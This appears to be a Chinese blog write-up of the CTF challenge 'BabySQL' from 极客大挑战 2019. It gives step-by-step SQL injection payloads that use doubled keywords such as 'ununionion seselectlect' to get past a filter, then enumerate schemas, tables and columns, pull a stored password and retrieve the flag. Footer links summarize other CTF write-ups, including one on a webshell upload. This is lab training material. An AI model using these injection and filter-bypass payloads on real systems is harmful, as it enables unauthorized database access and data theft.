首页 > 数据库 >[极客大挑战 2019]BabySQL 1

[极客大挑战 2019]BabySQL 1

时间:2024-11-08 18:45:35浏览次数:4  
标签:username 极客 23 frfromom BabySQL 2019 password seselectlect ununionion

[极客大挑战 2019]BabySQL 1

打开实例,源代码审计,发现登录请求check.php页面路径,采用get方法

image-20241105124220171

根据题目可知这是sql注入,尝试万能密码无果

?username=admin' or 1=1 --+&password=admin

image-20241105124712196

尝试order by、堆叠注入和union联合注入,发现都无效,怀疑字段被过滤(这边基本确定or被过滤)

image-20241105125130896image-20241105125232422image-20241105125326694image-20241105125904341

尝试双写绕过,成功绕过

?username=admin' ununionion seselectlect 1,2,3%23&password=1

image-20241105130056480

确定回显点为2,3

?username=1' ununionion seselectlect 1,2,3%23&password=1

image-20241105130205873

爆库,from和infomation被过滤,双写绕过,发现数据库geek和ctf

?username=1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata%23&password=1

image-20241105132704367

爆表

image-20241105131023356

双写绕过payload

?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="geek"%23&password=1

获得数据表b4bsql,geekuser,双写爆字段

?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'%23&password=1

image-20241105131809412

查表数据,发现password也被过滤

?username=1' ununionion seselectlect 1,2,concat(id,username,password) frfromom b4bsql%23&password=1

image-20241105132246980

双写绕过

?username=1' ununionion seselectlect 1,2,concat(passwoorrd) frfromom b4bsql%23&password=1

image-20241105132335664

获得password: i_want_to_play_2077,提交发现不是正确的flag,转向ctf表

?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="ctf"%23&password=1

发现Flag表

image-20241105133037620

爆字段,发现flag字段

?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'%23&password=1

image-20241105133146776

查表,显示当前不在数据库ctf中

?username=1' ununionion seselectlect 1,2,concat(flag) frfromom Flag%23&password=1

image-20241105133339777

小改一波,flag到手

?username=1' ununionion seselectlect 1,2,concat(flag) frfromom ctf.Flag%23&password=1

image-20241105133429661

标签:username,极客,23,frfromom,BabySQL,2019,password,seselectlect,ununionion
From: https://www.cnblogs.com/tazmi/p/18535676

相关文章

  • [ZJCTF 2019]NiZhuanSiWei 1
    [ZJCTF2019]NiZhuanSiWei1打开实例,发现为代码审计,确认为文件包含漏洞需要三个参数text、file、password,首先是text验证,逻辑显示text必须有值,且读取文件内容得是welcometothezjctf采用读取本地文件绕过,在E盘新建文件发现无效尝试data流?text=data://,welcometothe......
  • [SUCTF 2019]EasySQL 1
    [SUCTF2019]EasySQL1根据题目所得是个sql注入题,尝试万能密码显示不对,说明存在输入过滤,尝试堆叠注入1;showdatabases;成功显示数据库列表,并且发现数据库ctf查询数据表,查询出表Flag1;usectf;showtables;尝试select*fromFlag;发现出现错误\思考其sql语句为se......
  • [RoarCTF 2019]Easy Calc 1
    [RoarCTF2019]EasyCalc1打开实例发现是个计算器查看源代码看见设置了WAF的提示,并看见计算器的请求方法,注意到calc.php页面访问calc.php页面,查看到逻辑处理源代码,根据代码显示,确定这是一道RCE题,blacklist为黑名单过滤数组,总结:绕过数组就可以任意代码执行传递num=ls,发现......
  • [极客大挑战 2019]Http 1
    [极客大挑战2019]Http1代码审计发现页面Secret.php访问后显示页面,判断这题为头信息伪造Hackerbar梭哈,最终payload为GET/Secret.phpHTTP/1.1Host:node5.buuoj.cn:25132User-Agent:SycloverAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0......
  • [极客大挑战 2019]HardSQL 1
    [极客大挑战2019]HardSQL1打开实例,发现是个登陆页面,查看源代码,发现又是GET提交check.php万能密码尝试不太行,怀疑字段或者空格被过滤,尝试闭合不加其他东西确认空格、union、and等都被过滤了,尝试加个括号并未出现你可知被我速住了,臭弟弟字样,()未被过滤吧,尝试采用upda......
  • [极客大挑战 2019]BuyFlag 1
    [极客大挑战2019]BuyFlag1打开实例发现pay.php页面,有提示信息打开源码发现passwordpost提交逻辑burpsuite抓包传参,传入money和password参数,这里password是==弱比较,所以加个字符就可以绕过password=404a&money=100000000回显发现并没有变化注意到学生需要CUIT(Only......
  • [强网杯 2019]随便注 1
    [强网杯2019]随便注1万能密码上一波,回显成功,判断为'闭合注入?inject=1'or1=1--+(?inject=1unionselect1,2,3)union尝试,根据回显,发现存在字段过滤,过滤了select包括where等操作/select|update|delete|drop|insert|where|\./i尝试闭合堆叠?inject=1';showdat......
  • [极客大挑战 2019]Upload 1
    [极客大挑战2019]Upload1打开实例为文件上传页面,代码审计,发现为php文件,采用php马采用bp抓包修改后缀绕过,上传一句话木马<?phpphpinfo();@eval($_POST['cmd']);?>回显错误,显示不能为php,存在文件类型过滤尝试采用phtm文件包含php绕过显示非image文件尝试采用GIF89......
  • [极客大挑战 2019]Secret File 1
    [极客大挑战2019]SecretFile1代码审计发现页面/Archive_room.php访问页面点击SECRET按钮,bp抓包发现302重定向,附带一个注释页面secr3t.php访问secr3t.php,代码审计访问flag.php,发现一个贱贱的页面,确认是文件包含看不到页面且禁用../等参数,考虑用php的base64回显,paylo......
  • [极客大挑战 2019]PHP 1
    [极客大挑战2019]PHP1打开文件发现提示信息“备份文件”,查看源码并未发现其他有效信息采用dirsearch爆破目录,找到www.zip文件解压zip,发现是源码泄露提交flag,发现不正确,看到index.php源码中有Get传参,然后反序列化函数unserialize(),判断为反序列化漏洞;查看class.php可......